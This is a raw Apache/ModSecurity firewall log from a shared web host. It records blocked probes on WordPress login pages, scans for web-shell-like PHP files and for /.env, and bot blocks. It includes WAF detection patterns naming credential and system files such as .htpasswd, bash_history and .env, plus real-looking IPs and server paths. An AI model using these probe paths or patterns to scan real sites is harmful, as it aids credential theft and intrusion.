[Tue May 26 19:36:37.068414 2026] [security2:error] [pid 58470:tid 58591] [remote 173.212.233.81:35180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWo7LnjVHRH3AGGvmYjWAAACng"]
[Tue May 26 19:36:37.755794 2026] [security2:error] [pid 58470:tid 58709] [client 172.202.92.73:53193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/css.php"] [unique_id "ahWo7bnjVHRH3AGGvmYjegAAAG0"]
[Tue May 26 19:36:37.755901 2026] [security2:error] [pid 58470:tid 58709] [client 172.202.92.73:53193] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/css.php"] [unique_id "ahWo7bnjVHRH3AGGvmYjegAAAG0"]
[Tue May 26 19:36:38.141032 2026] [security2:error] [pid 58470:tid 58655] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo7bnjVHRH3AGGvmYjeQAAADc"]
[Tue May 26 19:36:38.835509 2026] [security2:error] [pid 58470:tid 58584] [remote 173.212.233.81:35180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWo7rnjVHRH3AGGvmYjngAAYnE"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:36:38.846327 2026] [security2:error] [pid 58470:tid 58693] [client 172.202.92.73:55786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/classwithtostring.php"] [unique_id "ahWo7rnjVHRH3AGGvmYjpQAAAF0"]
[Tue May 26 19:36:38.846457 2026] [security2:error] [pid 58470:tid 58693] [client 172.202.92.73:55786] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/classwithtostring.php"] [unique_id "ahWo7rnjVHRH3AGGvmYjpQAAAF0"]
[Tue May 26 19:36:39.613447 2026] [security2:error] [pid 58470:tid 58708] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo77njVHRH3AGGvmYjrgAAAGw"]
[Tue May 26 19:36:39.651952 2026] [security2:error] [pid 58470:tid 58666] [client 176.65.139.237:36664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "planooptics.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWo77njVHRH3AGGvmYjugAAAEI"]
[Tue May 26 19:36:39.819494 2026] [security2:error] [pid 58470:tid 58473] [remote 168.100.149.214:53554] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.cagmedya.com"] [uri "/web-tasarim/"] [unique_id "ahWo77njVHRH3AGGvmYjvgAAaQI"]
[Tue May 26 19:36:39.819620 2026] [security2:error] [pid 58470:tid 58705] [client 168.100.149.214:53554] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.cagmedya.com"] [uri "/web-tasarim/"] [unique_id "ahWo77njVHRH3AGGvmYjvgAAaQI"]
[Tue May 26 19:36:40.150257 2026] [security2:error] [pid 58470:tid 58493] [remote 216.73.216.30:42780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWo8LnjVHRH3AGGvmYjzAAAIhY"]
[Tue May 26 19:36:40.826785 2026] [security2:error] [pid 58470:tid 58629] [client 172.202.92.73:55771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/aa.php"] [unique_id "ahWo8LnjVHRH3AGGvmYj2QAAAB0"]
[Tue May 26 19:36:40.826894 2026] [security2:error] [pid 58470:tid 58629] [client 172.202.92.73:55771] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/aa.php"] [unique_id "ahWo8LnjVHRH3AGGvmYj2QAAAB0"]
[Tue May 26 19:36:40.859070 2026] [security2:error] [pid 58470:tid 58683] [client 176.65.139.232:58010] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "amdsi.svijaykumar.in"] [uri "/.env"] [unique_id "ahWo8LnjVHRH3AGGvmYj2gAAAFM"]
[Tue May 26 19:36:42.246940 2026] [security2:error] [pid 58470:tid 58616] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo8bnjVHRH3AGGvmYkAwAAABA"]
[Tue May 26 19:36:43.613596 2026] [security2:error] [pid 58470:tid 58713] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo87njVHRH3AGGvmYkLwAAAHE"]
[Tue May 26 19:36:44.197928 2026] [security2:error] [pid 58470:tid 58600] [client 47.128.47.142:15390] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahWo9LnjVHRH3AGGvmYkYQAAAAA"]
[Tue May 26 19:36:44.555418 2026] [security2:error] [pid 58470:tid 58692] [client 172.202.92.73:55770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/0x.php"] [unique_id "ahWo9LnjVHRH3AGGvmYkdwAAAFw"]
[Tue May 26 19:36:44.555542 2026] [security2:error] [pid 58470:tid 58692] [client 172.202.92.73:55770] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/0x.php"] [unique_id "ahWo9LnjVHRH3AGGvmYkdwAAAFw"]
[Tue May 26 19:36:44.704373 2026] [security2:error] [pid 58470:tid 58513] [remote 74.7.241.58:55436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWo9LnjVHRH3AGGvmYkgQAAbio"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes
[Tue May 26 19:36:44.949855 2026] [security2:error] [pid 58470:tid 58624] [client 113.165.12.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo9LnjVHRH3AGGvmYkcwAAABg"]
[Tue May 26 19:36:44.974002 2026] [security2:error] [pid 58470:tid 58523] [remote 216.73.216.30:42780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWo9LnjVHRH3AGGvmYkiQAAFjQ"]
[Tue May 26 19:36:45.378590 2026] [security2:error] [pid 58470:tid 58634] [client 207.175.95.144:63250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 144.95.175.207.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/xmlrpc.php"] [unique_id "ahWo9bnjVHRH3AGGvmYkkAAAACI"]
[Tue May 26 19:36:45.378720 2026] [security2:error] [pid 58470:tid 58634] [client 207.175.95.144:63250] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "haddingtonwines.com"] [uri "/xmlrpc.php"] [unique_id "ahWo9bnjVHRH3AGGvmYkkAAAACI"]
[Tue May 26 19:36:46.954798 2026] [security2:error] [pid 58470:tid 58611] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo9rnjVHRH3AGGvmYkwgAAAAs"]
[Tue May 26 19:36:48.576609 2026] [security2:error] [pid 58470:tid 58681] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo-LnjVHRH3AGGvmYk8AAAAFE"]
[Tue May 26 19:36:48.578600 2026] [security2:error] [pid 58470:tid 58606] [client 172.202.92.73:53197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/k.php"] [unique_id "ahWo-LnjVHRH3AGGvmYk_gAAAAY"]
[Tue May 26 19:36:48.578751 2026] [security2:error] [pid 58470:tid 58606] [client 172.202.92.73:53197] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/k.php"] [unique_id "ahWo-LnjVHRH3AGGvmYk_gAAAAY"]
[Tue May 26 19:36:50.495774 2026] [security2:error] [pid 58470:tid 58621] [client 176.65.139.239:49432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "obinnawrites.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWo-rnjVHRH3AGGvmYlQgAAABU"]
[Tue May 26 19:36:50.570583 2026] [security2:error] [pid 58470:tid 58617] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo-rnjVHRH3AGGvmYlLwAAABE"]
[Tue May 26 19:36:51.456024 2026] [security2:error] [pid 58470:tid 58670] [client 172.202.92.73:53194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/o.php"] [unique_id "ahWo-7njVHRH3AGGvmYlYQAAAEY"]
[Tue May 26 19:36:51.456161 2026] [security2:error] [pid 58470:tid 58670] [client 172.202.92.73:53194] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/o.php"] [unique_id "ahWo-7njVHRH3AGGvmYlYQAAAEY"]
[Tue May 26 19:36:52.213155 2026] [security2:error] [pid 58470:tid 58681] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo-7njVHRH3AGGvmYlawAAAFE"]
[Tue May 26 19:36:53.162200 2026] [security2:error] [pid 58470:tid 58646] [client 114.119.146.45:49725] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/referanslar/tetri-car-rental"] [unique_id "ahWo_bnjVHRH3AGGvmYllAAAAC4"], referer: https://www.cagmedya.com/referanslar
[Tue May 26 19:36:53.701523 2026] [security2:error] [pid 58470:tid 58700] [client 172.202.92.73:55781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/bb.php"] [unique_id "ahWo_bnjVHRH3AGGvmYlqQAAAGQ"]
[Tue May 26 19:36:53.701669 2026] [security2:error] [pid 58470:tid 58700] [client 172.202.92.73:55781] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/bb.php"] [unique_id "ahWo_bnjVHRH3AGGvmYlqQAAAGQ"]
[Tue May 26 19:36:54.084788 2026] [security2:error] [pid 58470:tid 58629] [client 185.191.171.3:54842] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/event/list/"] [unique_id "ahWo_rnjVHRH3AGGvmYltAAAAB0"]
[Tue May 26 19:36:54.084908 2026] [security2:error] [pid 58470:tid 58629] [client 185.191.171.3:54842] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/event/list/"] [unique_id "ahWo_rnjVHRH3AGGvmYltAAAAB0"]
[Tue May 26 19:36:54.140237 2026] [security2:error] [pid 58470:tid 58562] [remote 207.46.13.153:31444] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahWo_bnjVHRH3AGGvmYlngAACVs"]
[Tue May 26 19:36:54.298541 2026] [security2:error] [pid 58470:tid 58628] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWo_bnjVHRH3AGGvmYlrwAAABw"]
[Tue May 26 19:36:56.316833 2026] [fcgid:warn] [pid 58470:tid 58649] (70014)End of file found: [client 167.94.146.49:14470] mod_fcgid: can't get data from http client
[Tue May 26 19:36:57.107568 2026] [security2:error] [pid 58470:tid 58582] [remote 212.224.100.2:18482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpALnjVHRH3AGGvmYmJAAAGm8"]
[Tue May 26 19:36:57.261445 2026] [security2:error] [pid 58470:tid 58683] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpALnjVHRH3AGGvmYmGAAAAFM"]
[Tue May 26 19:36:57.512808 2026] [security2:error] [pid 58470:tid 58542] [remote 212.224.100.2:18482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpAbnjVHRH3AGGvmYmMgAAXkc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:36:58.086292 2026] [security2:error] [pid 58470:tid 58706] [client 147.78.183.73:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWo_rnjVHRH3AGGvmYl1AAAAGo"]
[Tue May 26 19:36:58.086326 2026] [security2:error] [pid 58470:tid 58706] [client 147.78.183.73:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWo_rnjVHRH3AGGvmYl1AAAAGo"]
[Tue May 26 19:36:58.087008 2026] [security2:error] [pid 58470:tid 58614] [client 147.78.183.73:60155] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/robots.txt"] [unique_id "ahWo_rnjVHRH3AGGvmYl0QAAAA4"]
[Tue May 26 19:36:59.122638 2026] [security2:error] [pid 58470:tid 58694] [client 172.202.92.73:55764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/rip.php"] [unique_id "ahWpA7njVHRH3AGGvmYmaQAAAF4"]
[Tue May 26 19:36:59.122786 2026] [security2:error] [pid 58470:tid 58694] [client 172.202.92.73:55764] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/rip.php"] [unique_id "ahWpA7njVHRH3AGGvmYmaQAAAF4"]
[Tue May 26 19:36:59.225558 2026] [security2:error] [pid 58470:tid 58605] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpArnjVHRH3AGGvmYmYQAAAAU"]
[Tue May 26 19:37:00.909661 2026] [security2:error] [pid 58470:tid 58637] [client 176.65.139.234:17910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "hotelesdivina.jhonweb.com"] [uri "/.env"] [unique_id "ahWpBLnjVHRH3AGGvmYmlQAAACU"]
[Tue May 26 19:37:01.151162 2026] [security2:error] [pid 58470:tid 58661] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpBLnjVHRH3AGGvmYmkAAAAD0"]
[Tue May 26 19:37:01.389173 2026] [security2:error] [pid 58470:tid 58497] [remote 65.2.90.30:51744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpBbnjVHRH3AGGvmYmpgAARxo"]
[Tue May 26 19:37:02.568132 2026] [security2:error] [pid 58470:tid 58682] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpBrnjVHRH3AGGvmYmwAAAAFI"]
[Tue May 26 19:37:03.778073 2026] [security2:error] [pid 58470:tid 58699] [client 172.202.92.73:55753] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/s.php"] [unique_id "ahWpB7njVHRH3AGGvmYm6wAAAGM"]
[Tue May 26 19:37:03.778181 2026] [security2:error] [pid 58470:tid 58699] [client 172.202.92.73:55753] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.amdsi.org.in"] [uri "/s.php"] [unique_id "ahWpB7njVHRH3AGGvmYm6wAAAGM"]
[Tue May 26 19:37:04.518252 2026] [security2:error] [pid 58470:tid 58476] [remote 54.36.102.244:53136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpCLnjVHRH3AGGvmYnAgAAZQU"]
[Tue May 26 19:37:04.982229 2026] [security2:error] [pid 58470:tid 58479] [remote 216.73.216.30:61237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpCLnjVHRH3AGGvmYnEwAAMAg"]
[Tue May 26 19:37:05.384936 2026] [security2:error] [pid 58470:tid 58618] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpCLnjVHRH3AGGvmYnEgAAABI"]
[Tue May 26 19:37:06.150200 2026] [http2:info] [pid 70836:tid 70836] h2_workers: created with min=128 max=192 idle_ms=600000
